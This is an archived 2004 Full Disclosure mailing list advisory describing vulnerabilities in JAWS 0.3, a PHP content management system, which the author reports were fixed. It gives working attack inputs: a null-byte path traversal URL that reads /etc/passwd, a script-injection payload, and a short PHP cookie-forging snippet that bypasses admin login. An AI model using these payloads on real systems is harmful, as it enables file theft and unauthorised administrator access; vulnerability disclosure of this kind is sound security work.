Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Multiples vulnerabilities in JAWS
From: nando () gigax org
Date: Tue, 6 Jul 2004 01:19:48 -0600 (CST)


check this...

/////////////////////////////////////////////////////


////            Vulnerable Program: JAWS
////
////            Version : 0.3   ; it's BETA probably ;)
////
////            Url: http://www.jaws.com.mx
////
////            The Bug: Multiples vulnerabilities
////
////            Date: Today, July 5 off 2004
////
////            Author: Fernando Quintero (a.k.a nonroot)
////             Email: nando () gigax org


//////////////////////////////////////////////////////


I. Affected software description:

 Jaws is a Framework and Content Management System for building dynamic
web sites.
 It aims to be User Friendly giving ease of use and lots of ways to
customize web sites,
 but at the same time is Developer Frendly, it offers a simple and
powerful framework to hack
 your own modules. Jaws is Free Software under the GPL.


 note: to hack your own modules, to hack your own modules, to hack your
own modules... ;)


II. Bugs


There are some vulnerabilities in the jaws code, it's were fixed quickly
by your main coder.


1) Full path disclosure ...


There are many ways to determine the full path to the web root directory:


a)  http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc

    Specifying a variable path, that does not exist.


b)  function jaws_error($text, $file, $line)
         {
             print ("<b style=\"color: #f00;\" JAWS
Error:</b><br/>".$text."<br/><i> ".$text."<br/><i>".$file.",line
".$line);
         exit;
         }

    The jaws_error() function, it returns the line and the full path to
the name of the file.


c)  http://127.0.0.1/jaws/include/config.php

    Trying to open some file in the include directory.



2) Arbitrary file browsing.


We can acceded to the file's content through the variable gadget.


http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc


This line show us the passwd file.

The use of the "path" variable is irrelevant, in the code can be seen a
line like:

$path= str_replace ("..","",$path) --> at this way we filter the content
of path, but in the

index.php file the "gadget" variable is not filter.


The "%00" is necessary because the script adds at the end of the name of
"gadget" variable the extencion ".php"



3) XSS (the fashionable word)

Cross site scripting  in the variable action, because it script returns
the content of the variable:


        http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold
letter</b>
        http://127.0.0.1/jaws/index.php?gadget=[a valid
gadget]&action=<script>alert('Colombia Rulx!!');</script>


In the index.php the vulnerable code is:

jaws_error ("Invalid operation: You can't display this action
[".$go_gadget->name."::".$go_gadget->action."]",__file__,__line__);


where "$go_gadget->action" content the erroneus action.


4) Validation without a password :)

There exist a way that allow us to get in the control panel with
administrator rights without a password.

The admin.php file have:


//

if ($GLOBALS["app"]->logged_on())
{
control panel code...
...
}

//

The logged_on() function is in the application.php file.

The function's code.

//

function logged_on()
    {
        return (md5($_SESSION["logged"]) ==$_COOKIE["logged"]);
    }

//


Is extrange to see this type of validation but there is!.

The $_SESSION["logged"] variable before entering the Control Panel it has
a Null ("") value.

a possible way to exploit it should be:

//BEGIN

//exploit.php
<?PHP
setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path
to jaws');
?>

//END


Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash for the NULL value

This way we can create a cookie ( that look like from the remote system)
and then try the Url:

http://127.0.0.1/jaws/admin.php

and we will be inside.



III. Solution
     ¨¨¨¨¨¨¨¨
    The main coder was contacted and the code was fixed in the cvs ;).


IV.  Greetings

    - Greets to GIGAX people.
    - Greets All the community. I learn of you!

V.  Contact

    Fernando Quintero
    nando () gigax org
    Medellín-Colombia

VI. Final words

    - Sorry by the english  and  !!! Viva Colombia !!!!!!!!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • Multiples vulnerabilities in JAWS nando (Jul 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault